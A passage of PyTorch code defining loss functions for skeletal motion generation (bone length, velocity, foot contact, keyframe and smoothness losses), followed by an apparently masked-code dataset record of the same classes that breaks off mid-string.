delta_y = joint_pos[..., 1] - parent_pos[..., 1]
delta_z = joint_pos[..., 2] - parent_pos[..., 2]
# [200, 6] PowBackward0
length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5
result_list[..., index] = length_temp
index += 1
return result_list
def forward(self, predict_seq, _train_x1, _train_x2):
train_bone_length = self.calculate_bone_length_for_seq(predict_seq)
_, gt_bone_length = torch.broadcast_tensors(train_bone_length, self.gt_bone_length)
MSE_loss = nn.MSELoss()
bone_loss = MSE_loss(train_bone_length, gt_bone_length)
return bone_loss * 2
class VelocityLoss(nn.Module):
def __init__(self, _mean, _std, config):
super(VelocityLoss, self).__init__()
self._mean = _mean
self._std = _std
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.pos_dim = config.pos_dim
self.velocity_dim = config.velocity_dim
self.vel_factor_dim = config.vel_factor_dim
def calculate_velocity(self, src_pos_seq, src_init_pos):
"""
:param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]
:param init_pos: the position of initial frame
:return:
"""
# [batch_size, T + 1, J * 3] grad_fn=<CatBackward>
temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)
velocity = temp_positions[:, 1:] - temp_positions[:, :-1]
return velocity
def get_vel_factor(self, velocity):
batch_size = velocity.shape[0]
seq_len = velocity.shape[1]
joint_num = int(velocity.shape[-1] / 3)
weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 1]
parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4, 4, 0, 0, 0]
weight_sum = []
for part in range(5):
p_sum = 0
for j in range(joint_num):
if parts[j] == part:
p_sum += weight[j]
weight_sum.append(p_sum)
vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim), dtype=torch.float32).to(self.device)
for i in range(seq_len):
factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=torch.float32).to(self.device)
for part in range(5):
for j in range(joint_num):
if parts[j] == part:
factor[:, part: part + 1] = factor[:, part: part + 1] + weight[j] / weight_sum[part] * \
pow(pow(velocity[:, i:i + 1, j * 3], 2) +
pow(velocity[:, i:i + 1, j * 3 + 1], 2) +
pow(velocity[:, i:i + 1, j * 3 + 2], 2), 0.5)
vel_factor[:, i, :] = factor
return vel_factor
def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):
# velocity
init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]
src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
src_init_pos = (init_pos *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)
# grad_fn=<DivBackward0>
_train_velocity = (train_velocity -
self._mean[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]) \
/ self._std[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]
train_vel_factor = self.get_vel_factor(train_velocity)
_train_vel_factor = (train_vel_factor - self._mean[-self.vel_factor_dim:]) / self._std[-self.vel_factor_dim:]
MSE_loss = nn.MSELoss()
zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape).to(self.device)
loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:], _train_velocity[:, 1:, :]) * 10 \
+ MSE_loss(predict_seq[:, 0, -self.velocity_dim:], zero_seq) * 20
loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:, 1:, :]) * 10
velocity_loss = loss1 * 2 + loss2 * 1.5
return velocity_loss
class ContactLoss(nn.Module):
def __init__(self, _mean, _std, config):
super(ContactLoss, self).__init__()
self._mean = _mean
self._std = _std
self.root_pos_dim = config.root_pos_dim
self.pos_dim = config.pos_dim
self.contact_dim = config.contact_dim
self.velocity_dim = config.velocity_dim
self.left_feet = config.left_foot
self.right_feet = config.right_foot
self.vel_factor_dim = config.vel_factor_dim
self.contact_loc = self.contact_dim + self.velocity_dim + self.vel_factor_dim
def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot, right_foot):
# [batch_size, T + 1, J * 3] grad_fn=<CatBackward>
temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)
left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:(left_foot[0] * 3 + 3)]
- temp_positions[:, :-1, left_foot[0] * 3:(left_foot[0] * 3 + 3)]) ** 2
left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)
left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:(left_foot[1] * 3 + 3)]
- temp_positions[:, :-1, left_foot[1] * 3:(left_foot[1] * 3 + 3)]) ** 2
left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)
right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:(right_foot[0] * 3 + 3)]
- temp_positions[:, :-1, right_foot[0] * 3:(right_foot[0] * 3 + 3)]) ** 2
right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)
right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:(right_foot[1] * 3 + 3)]
- temp_positions[:, :-1, right_foot[1] * 3:(right_foot[1] * 3 + 3)]) ** 2
right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)
feet_vel = torch.cat((left_foot0_vel, left_foot1_vel, right_foot0_vel, right_foot1_vel), -1)
return feet_vel # [batch_size, seq_size, 4]
def forward(self, predict_seq, _train_x1, _train_x2):
init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]
src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
src_init_pos = (init_pos *
self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])
feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos, self.left_feet,
self.right_feet)
feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self.velocity_dim):-self.velocity_dim] *
self._std[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + \
self._mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)])
contact_loss = torch.mean(torch.sum(torch.sum(feet_contact * feet_vels, dim=-1), dim=-1))
return contact_loss * 2
class KeyframeLoss(nn.Module):
def __init__(self, config):
super().__init__()
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.root_rot_dim = config.root_rot_dim
self.pos_dim = config.pos_dim
self.key_num = config.key_num
def forward(self, predict_seq, _train_x1, gt_seq):
key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim + self.root_rot_dim]
num = predict_pos.shape[1]
MSE_loss = nn.MSELoss()
loss = torch.zeros([]).to(self.device)
if num <= self.key_num * 2:
for i in range(num):
t = (i + 1) / (num + 1)
pos = predict_pos[:, i, :]
loss = loss + (1 - t) * MSE_loss(pos, key_frame1) + t * MSE_loss(pos, key_frame2)
else:
for i in range(self.key_num):
loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)
for i in range(num - self.key_num, num):
loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)
return loss * 2
class SmoothLoss(nn.Module):
def __init__(self, config):
super().__init__()
self.device = config.device
self.root_pos_dim = config.root_pos_dim
self.root_rot_dim = config.root_rot_dim
self.pos_dim = config.pos_dim
def forward(self, predict_seq, _train_x1, gt_seq):
init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.root_pos_dim]
init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.root_pos_dim]
root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.root_pos_dim]
last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:
self.pos_dim + self.root_pos_dim + self.root_rot_dim]
# pos_seq SliceBackward
seq_num = len(root_pos_seq[0])
batch_size = len(root_pos_seq)
root_pos_item = torch.zeros([]).to(self.device)
root_rot_item = torch.zeros([]).to(self.device)
MSE_loss = nn.MSELoss()
for idx in range(seq_num):
if idx == 0:
# MeanBackward0
root_pos_temp = MSE_loss(root_pos_seq[:, :1, :], init_root_pos[:])
root_rot_temp = MSE_loss(root_rot_seq[:, :1, :], init_root_rot[:])
elif idx == seq_num - 1:
root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos) + \
MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)
root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot) + \
MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)
else:
root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] - root_pos_seq[:, idx - 1, :], 2)) \
/ batch_size / seq_num
root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] - root_rot_seq[:, idx - 1, :], 2)) \
/ batch_size / seq_num
# AddBackward0
root_pos_item = root_pos_item + root_pos_temp
root_rot_item = root_rot_item + root_rot_temp
loss = root_pos_item + root_rot_item # DivBackward0
return loss * 1.5
|
normal
|
{
"blob_id": "edc66bdc365f9c40ee33249bd2d02c0c5f28256a",
"index": 8386,
"step-1": "<mask token>\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n <mask token>\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-2": "<mask token>\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n <mask token>\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-3": "<mask token>\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim\n ] + self._mean[:self.pos_dim]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3), 3)\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.\n device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.\n shape[1], 1, 1)\n positions = torch.cat((root_positions, new_seq), 2)\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3)), dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n 